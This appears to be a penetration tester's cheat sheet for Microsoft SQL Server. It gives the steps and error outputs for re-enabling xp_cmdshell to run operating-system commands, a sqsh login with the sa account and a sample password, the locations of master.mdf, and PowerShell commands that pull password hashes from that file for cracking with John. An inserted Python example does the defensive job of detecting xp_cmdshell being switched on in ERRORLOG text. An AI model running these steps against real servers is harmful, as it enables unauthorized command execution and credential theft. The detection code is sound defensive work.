MSSQL
Microsoft SQL Server - Port 1433
Command execution
### Ways to get xp_cmdshell working ###
1. Try it and see if it works
xp_cmdshell 'whoami'
go
############################
$ If you get the following, go on to step 2:
Msg 15281, Level 16, State 1
Server '1NSIDER\SQLEXPRESS', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system
administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
###########
2. Try to turn the component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go
############################
$ If you get the following, go on to step 3:
Msg 15123, Level 16, State 1
Server '1NSIDER\SQLEXPRESS', Procedure 'SP_CONFIGURE', Line 62
The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
###########
3. Enable 'show advanced options' first, then turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go
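To spot the sequence from steps 2 and 3 on the defensive side, this added example (not part of the original notes) scans SQL Server ERRORLOG text for the message that sp_configure writes when an option changes, and flags xp_cmdshell being switched on. The log lines are constructed samples; the function name and the 5-minute correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta

# SQL Server logs this message (error 15457) whenever sp_configure changes an option.
CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
WATCHED = {"xp_cmdshell", "show advanced options"}


def find_xp_cmdshell_enables(lines, window=timedelta(minutes=5)):
    """Return one finding per xp_cmdshell 0->1 change (hypothetical helper).

    severity is 'high' when the same session also switched on
    'show advanced options' shortly before (the step 3 sequence), else 'medium'.
    """
    advanced_on = {}  # spid -> time 'show advanced options' went 0 -> 1
    findings = []
    for line in lines:
        m = CHANGE.match(line.strip())
        if not m or m["opt"].lower() not in WATCHED:
            continue
        if (m["old"], m["new"]) != ("0", "1"):
            continue  # only enabling is of interest here
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        if m["opt"].lower() == "show advanced options":
            advanced_on[m["spid"]] = ts
            continue
        prior = advanced_on.get(m["spid"])
        chained = prior is not None and timedelta(0) <= ts - prior <= window
        findings.append({"time": ts, "spid": m["spid"],
                         "severity": "high" if chained else "medium"})
    return findings


# Constructed sample ERRORLOG lines (not taken from a real server).
SAMPLE_LOG = """\
2024-03-02 09:14:07.31 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 09:14:09.88 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 11:40:12.02 spid61      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
2024-03-03 02:05:44.10 spid70      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2024-03-03 02:06:01.47 spid72      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
""".splitlines()

if __name__ == "__main__":
    for f in find_xp_cmdshell_enables(SAMPLE_LOG):
        print(f["time"], f["spid"], f["severity"])
```

A 'medium' finding means xp_cmdshell was enabled on a server where advanced options were already visible, so it still deserves review.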
Useful commands
sqsh -S 10.10.10.111 -U sa -P qwerty -D <Database> // Specifying -D is optional
Interesting paths on a server running MSSQL
C:\Program Files\Microsoft SQL Server\SQL-VERSION\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\SQL-VERSION\MSSQL\Backup\master.mdf
Example:
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.mdf
## 8.3 SFN (short file name) used by older versions of DOS
Under this file-naming convention, the same paths are written as:
\PROGRA~1\MICROS~1\MSSQL1~1.SQL\MSSQL\DATA\master.mdf
\PROGRA~1\MICROS~1\MSSQL1~1.SQL\MSSQL\Backup\master.mdf
https://github.com/xpn/Powershell-PostExploitation
Add-Type -Path 'OrcaMDF.RawCore.dll'
Add-Type -Path 'OrcaMDF.Framework.dll'
## Wait a moment
import-module .\Get-MDFHashes.ps1
Get-MDFHashes -mdf "C:\Users\admin\Desktop\master.mdf"
## John can then be used to crack the hash.